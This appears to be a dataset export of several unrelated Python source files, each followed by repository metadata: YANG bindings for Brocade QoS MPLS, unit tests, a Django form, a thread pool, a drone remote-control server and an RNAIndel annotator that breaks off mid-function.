    Getter method for map_name_cmd2, mapped from YANG variable /qos_mpls/map_apply/apply_traffic_class_exp_map_name/map_name_cmd2 (map-name-type)
    """
    return self.__map_name_cmd2

  def _set_map_name_cmd2(self, v, load=False):
    """
    Setter method for map_name_cmd2, mapped from YANG variable /qos_mpls/map_apply/apply_traffic_class_exp_map_name/map_name_cmd2 (map-name-type)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_map_name_cmd2 is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_map_name_cmd2() directly.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="map-name-cmd2", rest_name="map-name-cmd2", parent=self, choice=(u'apply-traffic-class-exp', u'ca-map-name-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'<MAP NAME>;;Name for the MAP(Max 64)', u'cli-drop-node-name': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='map-name-type', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """map_name_cmd2 must be of a type compatible with map-name-type""",
          'defined-type': "brocade-apply-qos-mpls:map-name-type",
          'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="map-name-cmd2", rest_name="map-name-cmd2", parent=self, choice=(u'apply-traffic-class-exp', u'ca-map-name-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'<MAP NAME>;;Name for the MAP(Max 64)', u'cli-drop-node-name': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='map-name-type', is_config=True)""",
        })
    self.__map_name_cmd2 = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_map_name_cmd2(self):
    # Restore the generated default value for this leaf.
    self.__map_name_cmd2 = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="map-name-cmd2", rest_name="map-name-cmd2", parent=self, choice=(u'apply-traffic-class-exp', u'ca-map-name-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'<MAP NAME>;;Name for the MAP(Max 64)', u'cli-drop-node-name': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='map-name-type', is_config=True)

  def _get_all_zero_map_cmd2(self):
    """
    Getter method for all_zero_map_cmd2, mapped from YANG variable /qos_mpls/map_apply/apply_traffic_class_exp_map_name/all_zero_map_cmd2 (empty)
    """
    return self.__all_zero_map_cmd2

  def _set_all_zero_map_cmd2(self, v, load=False):
    """
    Setter method for all_zero_map_cmd2, mapped from YANG variable /qos_mpls/map_apply/apply_traffic_class_exp_map_name/all_zero_map_cmd2 (empty)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_all_zero_map_cmd2 is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_all_zero_map_cmd2() directly.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="all-zero-map-cmd2", rest_name="all-zero-map", parent=self, choice=(u'apply-traffic-class-exp', u'ca-all-zero-map-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Map traffic-class and drop prec to EXP 0', u'alt-name': u'all-zero-map', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """all_zero_map_cmd2 must be of a type compatible with empty""",
          'defined-type': "empty",
          'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="all-zero-map-cmd2", rest_name="all-zero-map", parent=self, choice=(u'apply-traffic-class-exp', u'ca-all-zero-map-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Map traffic-class and drop prec to EXP 0', u'alt-name': u'all-zero-map', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)""",
        })
    self.__all_zero_map_cmd2 = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_all_zero_map_cmd2(self):
    # Restore the generated default value for this leaf.
    self.__all_zero_map_cmd2 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="all-zero-map-cmd2", rest_name="all-zero-map", parent=self, choice=(u'apply-traffic-class-exp', u'ca-all-zero-map-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Map traffic-class and drop prec to EXP 0', u'alt-name': u'all-zero-map', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)

  def _get_default_map_cmd2(self):
    """
    Getter method for default_map_cmd2, mapped from YANG variable /qos_mpls/map_apply/apply_traffic_class_exp_map_name/default_map_cmd2 (empty)
    """
    return self.__default_map_cmd2

  def _set_default_map_cmd2(self, v, load=False):
    """
    Setter method for default_map_cmd2, mapped from YANG variable /qos_mpls/map_apply/apply_traffic_class_exp_map_name/default_map_cmd2 (empty)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_default_map_cmd2 is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_default_map_cmd2() directly.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="default-map-cmd2", rest_name="default-map", parent=self, choice=(u'apply-traffic-class-exp', u'ca-default-map-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Map traffic-class and drop prec to EXP based on default map', u'alt-name': u'default-map', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """default_map_cmd2 must be of a type compatible with empty""",
          'defined-type': "empty",
          'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="default-map-cmd2", rest_name="default-map", parent=self, choice=(u'apply-traffic-class-exp', u'ca-default-map-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Map traffic-class and drop prec to EXP based on default map', u'alt-name': u'default-map', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)""",
        })
    self.__default_map_cmd2 = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_default_map_cmd2(self):
    # Restore the generated default value for this leaf.
    self.__default_map_cmd2 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="default-map-cmd2", rest_name="default-map", parent=self, choice=(u'apply-traffic-class-exp', u'ca-default-map-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Map traffic-class and drop prec to EXP based on default map', u'alt-name': u'default-map', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)

  def _get_All_cmd2(self):
    """
    Getter method for All_cmd2, mapped from YANG variable /qos_mpls/map_apply/apply_traffic_class_exp_map_name/All_cmd2 (empty)
    """
    return self.__All_cmd2

  def _set_All_cmd2(self, v, load=False):
    """
    Setter method for All_cmd2, mapped from YANG variable /qos_mpls/map_apply/apply_traffic_class_exp_map_name/All_cmd2 (empty)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_All_cmd2 is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_All_cmd2() directly.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="All-cmd2", rest_name="All", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply globally on all interface', u'alt-name': u'All'}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """All_cmd2 must be of a type compatible with empty""",
          'defined-type': "empty",
          'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="All-cmd2", rest_name="All", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply globally on all interface', u'alt-name': u'All'}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)""",
        })
    self.__All_cmd2 = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_All_cmd2(self):
    # Restore the generated default value for this leaf.
    self.__All_cmd2 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="All-cmd2", rest_name="All", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply globally on all interface', u'alt-name': u'All'}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)

  # Public property wrappers over the generated getters/setters.
  map_name_cmd2 = __builtin__.property(_get_map_name_cmd2, _set_map_name_cmd2)
  all_zero_map_cmd2 = __builtin__.property(_get_all_zero_map_cmd2, _set_all_zero_map_cmd2)
  default_map_cmd2 = __builtin__.property(_get_default_map_cmd2, _set_default_map_cmd2)
  All_cmd2 = __builtin__.property(_get_All_cmd2, _set_All_cmd2)

  # Members of the 'apply-traffic-class-exp' YANG choice (mutually exclusive).
  __choices__ = {u'apply-traffic-class-exp': {u'ca-map-name-cmd2': [u'map_name_cmd2'], u'ca-default-map-cmd2': [u'default_map_cmd2'], u'ca-all-zero-map-cmd2': [u'all_zero_map_cmd2']}}

  _pyangbind_elements = {'map_name_cmd2': map_name_cmd2, 'all_zero_map_cmd2': all_zero_map_cmd2, 'default_map_cmd2': default_map_cmd2, 'All_cmd2': All_cmd2, }
74.20614
665
0.729594
2,602
16,919
4.49731
0.071868
0.035891
0.032473
0.053581
0.843275
0.803367
0.780636
0.770723
0.760554
0.749103
0
0.010823
0.126249
16,919
227
666
74.53304
0.780762
0.137242
0
0.422819
0
0.04698
0.41266
0.196012
0
0
0
0
0
1
0.100671
false
0
0.053691
0
0.288591
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
99d0ec460ef85f6b78235bb1df6008162b91ab1f
904
py
Python
dypy/tests/test_variables.py
nickrsan/dypy
78ebdc02ce1908446d4cc6e0ee1927c91f820d9f
[ "MIT" ]
3
2019-03-12T21:13:45.000Z
2022-02-18T09:55:07.000Z
dypy/tests/test_variables.py
nickrsan/dypy
78ebdc02ce1908446d4cc6e0ee1927c91f820d9f
[ "MIT" ]
2
2019-04-03T02:13:54.000Z
2019-04-03T02:18:56.000Z
dypy/tests/test_variables.py
nickrsan/dypy
78ebdc02ce1908446d4cc6e0ee1927c91f820d9f
[ "MIT" ]
null
null
null
import unittest

import dypy


class VariableSupportTest(unittest.TestCase):
    """Exercises dypy.variables.check_variable_id name normalisation."""

    def test_check_variable_id(self):
        """
        Makes sure that when no variable_id is provided, we get the names we expect
        :return:
        """
        normalised_expectations = {
            "variable_id": "variable_id",
            "Variable_id": "variable_id",
            "Variable ID": "variable_id",
            "5three Variable": "three_variable",
            "Remove-my-hyphens": "remove_my_hyphens",
        }
        case_preserving_expectations = {
            "variable_id": "variable_id",
            "Variable_id": "Variable_id",
            "Variable ID": "Variable_ID",
            "5three Variable": "three_Variable",
            "Remove-my-hyphens": "Remove_my_hyphens",
        }

        # Without an explicit variable_id the derived id is fully normalised.
        for name, expected in normalised_expectations.items():
            self.assertEqual(expected, dypy.variables.check_variable_id(name, None))

        # With an explicit variable_id the original capitalisation survives.
        for name, expected in case_preserving_expectations.items():
            self.assertEqual(expected, dypy.variables.check_variable_id(name, name))
25.828571
97
0.724558
118
904
5.245763
0.347458
0.258481
0.290792
0.323102
0.487884
0.487884
0.487884
0.378029
0.378029
0.378029
0
0.002614
0.153761
904
34
98
26.588235
0.806536
0.10177
0
0.090909
0
0
0.321696
0
0
0
0
0
0.090909
1
0.045455
false
0
0.090909
0
0.181818
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
99d12e7d29fef5924937d4cc8ce631b58a0747b3
740
py
Python
tests/testoctal.py
antoniovilarinholopes/converttodecimal
8fe58c4b7409d83ed66fb4b99f8953acf47bad88
[ "MIT" ]
null
null
null
tests/testoctal.py
antoniovilarinholopes/converttodecimal
8fe58c4b7409d83ed66fb4b99f8953acf47bad88
[ "MIT" ]
null
null
null
tests/testoctal.py
antoniovilarinholopes/converttodecimal
8fe58c4b7409d83ed66fb4b99f8953acf47bad88
[ "MIT" ]
null
null
null
import unittest
import baseconverter as bctr


class TestOctal(unittest.TestCase):
    """Tests octal-to-decimal conversion via bctr.DecimalBaseConverter."""

    base = 8
    # Kept for backward compatibility; setUp shadows these with per-test
    # instance lists (the old class-level lists were shared and grew on
    # every setUp call, leaking fixtures between tests).
    tests = []
    results = []

    def setUp(self):
        # Fresh instance-level fixtures for each test run.
        self.tests = []
        self.results = []
        converter = bctr.DecimalBaseConverter("7", self.base)
        self.tests.append(converter)
        self.results.append(7)
        converter = bctr.DecimalBaseConverter("10", self.base)
        self.tests.append(converter)
        self.results.append(8)

    def test(self):
        # Valid octal digit strings convert to their decimal values.
        for conv, result in zip(self.tests, self.results):
            self.assertEqual(conv.convert(), result)
        # "8" is not a valid octal digit and must raise.
        converter = bctr.DecimalBaseConverter("8", self.base)
        with self.assertRaises(bctr.InvalidDigitForBaseException) as context:
            converter.convert()
        # BUGFIX: the original used "".join(context.exception), which raises
        # TypeError (exceptions are not iterables of strings).
        self.assertTrue("invalid digits" in str(context.exception))
28.461538
73
0.697297
85
740
6.070588
0.435294
0.052326
0.19186
0.065891
0.189922
0.189922
0.189922
0.189922
0.189922
0
0
0.011551
0.181081
740
25
74
29.6
0.839934
0
0
0.1
0
0
0.024324
0
0
0
0
0
0.15
1
0.1
false
0
0.1
0
0.4
0
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
99d3397248d3d1b7a9a0b3eafedbd9115d28514f
544
py
Python
sgfood/forms.py
kylerlee/Restaurant-Reviews-Web-App
795c46a2122717b94830249db005850898dd572a
[ "MIT" ]
null
null
null
sgfood/forms.py
kylerlee/Restaurant-Reviews-Web-App
795c46a2122717b94830249db005850898dd572a
[ "MIT" ]
null
null
null
sgfood/forms.py
kylerlee/Restaurant-Reviews-Web-App
795c46a2122717b94830249db005850898dd572a
[ "MIT" ]
null
null
null
from django import forms
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm


class UserRegisterForm(UserCreationForm):
    """Registration form: UserCreationForm plus email and optional names."""

    # Extra fields layered on top of the base username/password1/password2.
    email = forms.EmailField(label='Email')
    first_name = forms.CharField(
        max_length=20, label='First Name', required=False)
    last_name = forms.CharField(
        max_length=20, label='Last Name', required=False)

    class Meta:
        # Save against the built-in auth User model; 'fields' fixes which
        # form fields are rendered and in what order.
        model = User
        fields = ['username', 'email', 'first_name', 'last_name', 'password1', 'password2']
32
58
0.681985
63
544
5.793651
0.460317
0.082192
0.093151
0.115068
0.186301
0.186301
0.186301
0
0
0
0
0.013921
0.207721
544
16
59
34
0.832947
0
0
0
0
0
0.136029
0
0
0
0
0
0
1
0
false
0.076923
0.230769
0
0.615385
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
1
0
0
2
99d362a541a18ec8d12caecd6f148f337e916cdc
1,391
py
Python
src/external_script_runner.py
salvatorenovelli/python-automation-runner
7d18d02f3e60980d18e97991e7991ba3aa43e79a
[ "Apache-2.0" ]
1
2019-06-05T00:56:13.000Z
2019-06-05T00:56:13.000Z
src/external_script_runner.py
salvatorenovelli/python-automation-runner
7d18d02f3e60980d18e97991e7991ba3aa43e79a
[ "Apache-2.0" ]
null
null
null
src/external_script_runner.py
salvatorenovelli/python-automation-runner
7d18d02f3e60980d18e97991e7991ba3aa43e79a
[ "Apache-2.0" ]
null
null
null
import logging
import os
import signal
import time
from multiprocessing import Process


class ExternalScript:
    """Runs a user-supplied script's main_loop in a child process."""

    def __init__(self, name, path):
        self.name = name      # module name to register the script under
        self.path = path      # filesystem path of the script source
        self.process = None   # child Process, or None when not running

    def start_main_loop(self):
        """Spawn the child process (no-op if one is already running)."""
        if self.process is None:
            self.process = Process(target=run_external_script_main_loop, args=(self.name, self.path))
            self.process.start()
            logging.info("External script started. PID: %d", self.process.pid)

    def stop_main_loop(self):
        """Terminate the child process with SIGTERM (no-op if not running)."""
        if self.process is not None:
            logging.info("Killing external script with PID: %d", self.process.pid)
            os.kill(self.process.pid, signal.SIGTERM)
            self.process = None


def run_external_script_main_loop(name, path):
    """Load the script at `path` and call its main_loop() forever.

    Per-iteration errors are logged and swallowed so one bad iteration does
    not stop the loop; a failure to load the script ends the loop entirely.
    """
    try:
        script = import_source(name, path)
        logging.info("Script loaded")
        while True:
            start = time.time()
            try:
                script.main_loop()
            except Exception as e:
                logging.error("Error in script '%s': %s", path, str(e))
            # Throttle scripts whose main_loop returns almost instantly, so a
            # trivial loop body doesn't spin the CPU.
            if (time.time() - start) < .05:
                time.sleep(1)
    except Exception as e1:
        # Lazy %-style args instead of eager string concatenation.
        logging.error("Unable to run main_loop: %s", str(e1))


def import_source(name, path):
    """Import and return the module at `path`, registered as `name`.

    Uses importlib.util instead of the deprecated
    SourceFileLoader(...).load_module(); the sys.modules registration
    mirrors load_module()'s behaviour.
    """
    import sys
    import importlib.util
    spec = importlib.util.spec_from_file_location(name, path)
    module = importlib.util.module_from_spec(spec)
    sys.modules[name] = module
    spec.loader.exec_module(module)
    return module
30.23913
101
0.615385
175
1,391
4.771429
0.342857
0.118563
0.050299
0.043114
0.167665
0.064671
0.064671
0
0
0
0
0.00603
0.284687
1,391
45
102
30.911111
0.833166
0
0
0.108108
0
0
0.093458
0
0
0
0
0
0
1
0.135135
false
0
0.216216
0
0.405405
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99d682c3f29dd2435974d682aa3469e2490bd049
220
py
Python
spotui/src/Logging.py
dbkosky/spotui
cabc6fbde3c0fbbc73fd94055661185ad51969c1
[ "MIT" ]
410
2020-01-08T17:23:52.000Z
2022-03-31T03:19:01.000Z
spotui/src/Logging.py
octoshrimpy/spotui
b0d195d1cdc803839e8421472ed897521c6124d4
[ "MIT" ]
28
2020-01-09T00:10:10.000Z
2022-03-19T01:22:39.000Z
spotui/src/Logging.py
octoshrimpy/spotui
b0d195d1cdc803839e8421472ed897521c6124d4
[ "MIT" ]
22
2020-01-10T04:08:22.000Z
2022-03-17T13:31:13.000Z
import logging
import os

# Route all root-logger output to ~/.cache/spotui.log, truncating on start.
user_config_dir = os.path.expanduser("~")
_log_path = os.path.join(user_config_dir, ".cache", "spotui.log")
# BUGFIX: filemode='w' cannot create missing directories, so a fresh system
# without ~/.cache crashed here; create it first.
os.makedirs(os.path.dirname(_log_path), exist_ok=True)
logging.basicConfig(filename=_log_path,
                    filemode='w',
                    format='%(name)s - %(levelname)s - %(message)s')
31.428571
82
0.659091
28
220
5.035714
0.714286
0.141844
0.184397
0
0
0
0
0
0
0
0
0
0.168182
220
6
83
36.666667
0.770492
0
0
0
0
0
0.263636
0
0
0
0
0
0
1
0
false
0
0.4
0
0.4
0
1
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
4
99d6b69bacc16386a2d51e2e47e08c035278f928
1,029
py
Python
drone/remote_control/start.py
dpm76/eaglebone
46403d03359a780f385ccb1f05b462869eddff89
[ "ISC" ]
null
null
null
drone/remote_control/start.py
dpm76/eaglebone
46403d03359a780f385ccb1f05b462869eddff89
[ "ISC" ]
18
2016-03-30T08:43:45.000Z
2017-03-27T11:14:17.000Z
drone/remote_control/start.py
dpm76/eaglebone
46403d03359a780f385ccb1f05b462869eddff89
[ "ISC" ]
2
2016-03-06T20:38:06.000Z
2019-09-10T14:46:35.000Z
# -*- coding: utf-8 -*-
'''
Created on 15/06/2015

@author: david
'''
import sys

# Python 2 and 3 expose the TCP server class under different module names.
if sys.version_info.major < 3:
    from SocketServer import TCPServer
else:
    from socketserver import TCPServer

import datetime
import logging

from remote_control.dispatching import Dispatcher


def main():
    """Configure file logging, then serve remote-control requests forever."""
    timestamp = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
    logging.basicConfig(
        filename="remote_control_{0}.log".format(timestamp),
        format='%(asctime)s.%(msecs)03d %(levelname)-8s %(message)s',
        datefmt='%d/%m/%y %H:%M:%S',
        level=logging.ERROR)
    logging.info("**** [Starting server...] ****")

    server = TCPServer(("0.0.0.0", 2121), Dispatcher)
    message = "Waiting for remote control..."
    logging.info(message)
    print(message)

    try:
        server.serve_forever()
    except KeyboardInterrupt:
        print("[CTRL+C] -> Stop")
    finally:
        print("Goodbye!")
        logging.info("**** [Server finish] ****")


if __name__ == '__main__':
    main()
21.4375
118
0.594752
119
1,029
5.02521
0.571429
0.065217
0.073579
0.103679
0
0
0
0
0
0
0
0.027954
0.23518
1,029
47
119
21.893617
0.731893
0.058309
0
0
0
0
0.235172
0.046826
0
0
0
0
0
1
0.038462
false
0
0.230769
0
0.269231
0.115385
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99d6c24393f666e309f1685a7bc70884ed6cd31a
2,390
py
Python
src/threadpool.py
forumulator/pySlader
b2300da6c10f46f0fa9933be722462a42a98bdbc
[ "MIT" ]
1
2018-10-28T23:33:57.000Z
2018-10-28T23:33:57.000Z
src/threadpool.py
forumulator/pySlader
b2300da6c10f46f0fa9933be722462a42a98bdbc
[ "MIT" ]
null
null
null
src/threadpool.py
forumulator/pySlader
b2300da6c10f46f0fa9933be722462a42a98bdbc
[ "MIT" ]
null
null
null
from queue import Queue, Empty
import threading
from threading import Thread


class Worker(Thread):
    """Thread executing tasks from a given tasks queue.

    The thread is signalable, so it can be told to exit cleanly.
    """

    _TIMEOUT = 2  # seconds to block on the queue before re-checking `done`

    def __init__(self, tasks, th_num):
        Thread.__init__(self)
        self.tasks = tasks
        self.daemon, self.th_num = True, th_num
        self.done = threading.Event()
        self.start()

    def run(self):
        # Poll with a timeout so the exit flag is noticed even when idle.
        while not self.done.is_set():
            try:
                func, args, kwargs = self.tasks.get(block=True, timeout=self._TIMEOUT)
                try:
                    func(*args, **kwargs)
                except Exception as e:
                    # A failing task must not kill the worker thread.
                    print(e)
                finally:
                    self.tasks.task_done()
            except Empty:
                pass
        return

    def signal_exit(self):
        """Signal to thread to exit"""
        self.done.set()


class ThreadPool:
    """Pool of threads consuming tasks from a queue"""

    def __init__(self, num_threads, tasks=None):
        # BUGFIX: the original signature used `tasks=[]`, a mutable default
        # shared by every ThreadPool constructed without an explicit argument.
        self.tasks = Queue(num_threads)
        self.workers = []
        self.done = False
        self._init_workers(num_threads)
        for task in (tasks if tasks is not None else []):
            self.tasks.put(task)

    def _init_workers(self, num_threads):
        # Spawn one Worker per slot; Workers start themselves in __init__.
        for i in range(num_threads):
            self.workers.append(Worker(self.tasks, i))

    def add_task(self, func, *args, **kwargs):
        """Add a task to the queue"""
        self.tasks.put((func, args, kwargs))

    def _close_all_threads(self):
        """Signal all threads to exit and lose the references to them"""
        for workr in self.workers:
            workr.signal_exit()
        self.workers = []

    def wait_completion(self):
        """Wait for completion of all the tasks in the queue"""
        self.tasks.join()

    def __del__(self):
        self._close_all_threads()


def create_task(func, *args, **kwargs):
    """Package a call as the (func, args, kwargs) tuple the pool consumes."""
    return (func, args, kwargs)


if __name__ == '__main__':
    from random import randrange
    from time import sleep

    delays = [randrange(1, 10) for i in range(30)]

    def wait_delay(d):
        print('sleeping for (%d)sec' % d)
        sleep(d)

    pool = ThreadPool(20)
    for i, d in enumerate(delays):
        pool.add_task(wait_delay, d)
    pool.wait_completion()
27.471264
79
0.562762
296
2,390
4.358108
0.310811
0.062791
0.065116
0.026357
0
0
0
0
0
0
0
0.005031
0.334728
2,390
87
80
27.471264
0.806289
0.085356
0
0.065574
0
0
0.013592
0
0
0
0
0
0
1
0.180328
false
0.016393
0.081967
0.016393
0.344262
0.032787
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99d87c84c1f650596334fdedf093088152cfe4fd
1,069
py
Python
isaactest/tests/questionnaire.py
jsharkey13/isaac-selenium-testing
fc57ec57179cf7d9f0bb5ef46d759792b2af3bc8
[ "MIT" ]
null
null
null
isaactest/tests/questionnaire.py
jsharkey13/isaac-selenium-testing
fc57ec57179cf7d9f0bb5ef46d759792b2af3bc8
[ "MIT" ]
1
2016-01-15T11:28:06.000Z
2016-01-25T17:09:18.000Z
isaactest/tests/questionnaire.py
jsharkey13/isaac-selenium-testing
fc57ec57179cf7d9f0bb5ef46d759792b2af3bc8
[ "MIT" ]
1
2019-05-14T16:53:49.000Z
2019-05-14T16:53:49.000Z
from ..utils.log import log, INFO, ERROR, PASS from ..utils.isaac import kill_irritating_popup, disable_irritating_popup from ..utils.i_selenium import assert_tab from ..tests import TestWithDependency __all__ = ["questionnaire"] ##### # Test : Questionnaire Popup ##### @TestWithDependency("QUESTIONNAIRE", ["LOGIN"]) def questionnaire(driver, ISAAC_WEB, **kwargs): """Test if the questionnaire popup is shown. Must run immediately after the "LOGIN" test. - 'driver' should be a Selenium WebDriver. - 'ISAAC_WEB' is the string URL of the Isaac website to be tested. """ assert_tab(driver, ISAAC_WEB) log(INFO, "Ensure the popup has not been disabled, and wait 30 seconds for it to display.") disable_irritating_popup(driver, undo=True) # Make sure we've not disabled it at all! if kill_irritating_popup(driver, 30): log(PASS, "Questionnaire popup shown and closed.") return True else: log(ERROR, "Questionnaire popup not shown! This may be because none are published?") return False
36.862069
95
0.707203
144
1,069
5.125
0.506944
0.081301
0.051491
0
0
0
0
0
0
0
0
0.004662
0.197381
1,069
28
96
38.178571
0.855478
0.255379
0
0
0
0
0.283465
0
0
0
0
0
0.125
1
0.0625
false
0.125
0.25
0
0.4375
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
99d9a48b5d99ac3508e56112ec75780dfbe5858e
8,893
py
Python
rnaindel/rnaindel_lib/indel_annotator.py
adamdingliang/RNAIndel
bc154a25a459ca0dd5c1f2ce064944e979105d23
[ "Apache-2.0" ]
1
2019-01-07T21:21:28.000Z
2019-01-07T21:21:28.000Z
rnaindel/rnaindel_lib/indel_annotator.py
adamdingliang/RNAIndel
bc154a25a459ca0dd5c1f2ce064944e979105d23
[ "Apache-2.0" ]
2
2019-01-05T16:39:41.000Z
2019-01-14T16:00:43.000Z
rnaindel/rnaindel_lib/indel_annotator.py
adamdingliang/RNAIndel
bc154a25a459ca0dd5c1f2ce064944e979105d23
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python3
"""2nd step of the analysis

Checks if indels are coding or non-coding
and annotates coding indels with variant effect

indel_annotator is the main routine of this module
"""

import sys
import pysam
import logging
import pandas as pd
from functools import partial
from .indel_curator import curate_indel_in_genome
from .indel_sequence import CodingSequenceWithIndel

logger = logging.getLogger(__name__)


def indel_annotator(df, refgene, fasta, chr_prefixed):
    """Sort coding indels and annotate coding indels with variant effect

    Args:
        df (pandas.DataFrame): with a header: 'chr', 'pos', 'ref', 'alt'
        refgene (str): path to refCodingExon.bed.gz
        fasta (str): path to fasta
        chr_prefixed (bool): True if chromosome names in BAM are "chr"-prefixed
    Returns:
        df (pandas.DataFrame): with indels annotated
    Raises:
        SystemExit: via sys.exit(0) when no indel falls in a coding region
    """
    df["is_ins"] = df.apply(is_insertion, axis=1)
    df["indel_seq"] = df.apply(get_indel_seq, axis=1)

    # performs annotation
    exon_data = pysam.TabixFile(refgene)
    anno = partial(
        annotate_indels, exon_data=exon_data, fasta=fasta, chr_prefixed=chr_prefixed
    )
    df["annotation"] = df.apply(anno, axis=1)

    # removes unannotated calls (non-coding indels)
    df = df[df["annotation"] != "-"]
